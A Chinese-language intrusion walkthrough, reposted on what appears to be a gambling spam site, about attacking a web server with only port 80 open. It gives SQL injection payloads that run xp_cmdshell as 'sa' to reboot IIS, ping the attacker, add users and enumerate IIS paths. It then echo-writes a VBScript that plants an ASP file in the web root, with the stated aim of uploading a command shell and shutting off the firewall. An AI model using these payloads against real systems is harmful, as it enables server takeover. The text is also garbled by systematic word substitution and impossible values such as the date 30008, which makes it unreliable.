只开80端口主机的安全检测(上)

  • 时间:
  • 浏览:2
  • 来源:5分快3官网平台_5分快3网投平台_5分快3投注平台_5分快3娱乐平台





作者: 论坛挂接 zdnet网络安全

CNETNews.com.cn

30008-01-24 18:59:35

关键词: 端口 安全检测 安全管理

扫描:先用x-scan2.3扫端口晕只开3000,否则我又扫了一遍唉还是一样的结果,看来管理员可是算笨啊! 

检查系统洞洞:先ping了一下竟然ping不通,不过有刚才的扫描结果就很明白了应是iis5再去掉 网页上明显用的asp那我的主机当然是win2k未必咯. 

分析:唉也没哪此可不可否 分析咯可不可否 了从3000入手,看看后边还会些哪此东东有另2个 查询系统输入单引号试试,返回错误类型: 

Microsoft OLE DB Provider for ODBC Drivers (0x3000040E14) 

/mingce/student1.asp, 第 300 行 

看来运气可是算太坏嘛........应该有sql注入的毛病......... 

为了进一步确认试试运气输http://x.x.x.x//mingce/student1.asp.BAK 

的确可不可否 正确提交哟返回如下: 

if request.form("xsxm")="" and request.form("xsxh")="" then 

Set Conn=Server.CreateObject("ADODB.Connection") 

Conn.Open "Driver=;Server=localhost;Database=xxxx;UID=sa;PWD="&application("mm_xxx") 

比较长可是后边三行最重要了:亲戚亲戚当我们可不可否 看出ASP后台任务管理器没用对用户提交进行任何的 

过滤,一齐数据库用的ADODB.Connection对象(可能性是ADODB.Command就算越来越过滤 

特殊符号可是行的),当然也可不可否 看出数据库使用的sa来连接的! 

(Tip:着实就算亲戚亲戚当我们看可不可否 了ASP的源代码亲戚亲戚当我们也可不可否 试试xp_cmdshell ’iisreset /reboot’ 

或是xp_cmdshell ’ping 你.的.I.P’,可能性第另2个 命令能执行成功越来越在半分钟之内远程 

系统会重启一次的,第十个 命令你自已的机子的防火墙通常会提示来至x.x.x.x的主机向你 

发送ICMP数据,不过对于有些禁止任何数据出的主机第十个 命令可能性可是行哟) 

好了通后来边的分析亲戚亲戚当我们可不可否 做哪此呢: 

通过在web页以管理员的身份来执行系统命令(不过越来越回显的) 

可能性是一般的系统主机简单了xp_cmdshell ’net user .....’愿意不写了 

否则我亲戚亲戚当我们现在环境是系统只开了3000端口,就算亲戚亲戚当我们能加ADMIN用户也没用三 

事先通常否则我开个139/445/135就可不可否 远程管理了不过现在不行. 

我的思路: 

1)找到web目录的路径 

2)写入另2个 简单的cmd.asp用来找到防火墙的具体名字 

3)通过xp_cmdshell来关闭防火墙服务 

具体实现: 

第一步明显是最难的咯 

我那我打算用adminScripts后边的建web站的最好的措施 建另2个 我自已的可执行目录的 

结果不行哟.否则我就想到了使用adsutil.vbs任务管理器我是那我执行的 

a’;exec master..xp_cmdshell ’cmd /c cScript c:inetpubadminscripsadsutil.vbs enum w3svc/1/root>a.txt’;-- 

是还会很长啦  通过它亲戚亲戚当我们可不可否 把iis后边第另2个 虚拟web站点的设置请况(当然包括它所在的实际目录咯)导入到a.txt中 

对于a.txt的实际位置默认当然是c:winntsystem32,着实这都还会大问題,不过遇到管理员把adsutil.vbs删了或是倒进别 

的地方亲戚亲戚当我们就没最好的措施 了(可能性性自已用echo 命令写另2个 吧) 

第二步:用echo命令写下面的代码到c:中,有些有些吗可是算吧   



.....xp_cmdshell ’echo set fso1=createobject("Scripting.filesystemobject")>c:ead.vbs’;-- 

.....xp_cmdshell ’echo Set WshShell = WScript.CreateObject("WScript.Shell")>>c:ead.vbs’;-- 

..... 

-------------------read.vbs--------------------------------- 

set fso1=createobject("Scripting.filesystemobject") 

Set WshShell = WScript.CreateObject("WScript.Shell") 

spa=WshShell.Environment("process")("windir") 

set fil =fso1.opentextfile(spa & "system32aa.txt") 

do while not fil.atendofstream 

nr=fil.readline 

if left(nr,4)="Path" then 

pa=mid(nr,instr(nr,")")+3,len(nr)-instr(nr,")")-3) 

exit do 

end if 

loop 

set fil1 =fso1.opentextfile(pa&"dd.asp",2,true) 

fil1.writeline "<%response.write request.servervariables(""APPL_PHYSICAL_PATH"")%>" 

---------------cut here--------------------------------------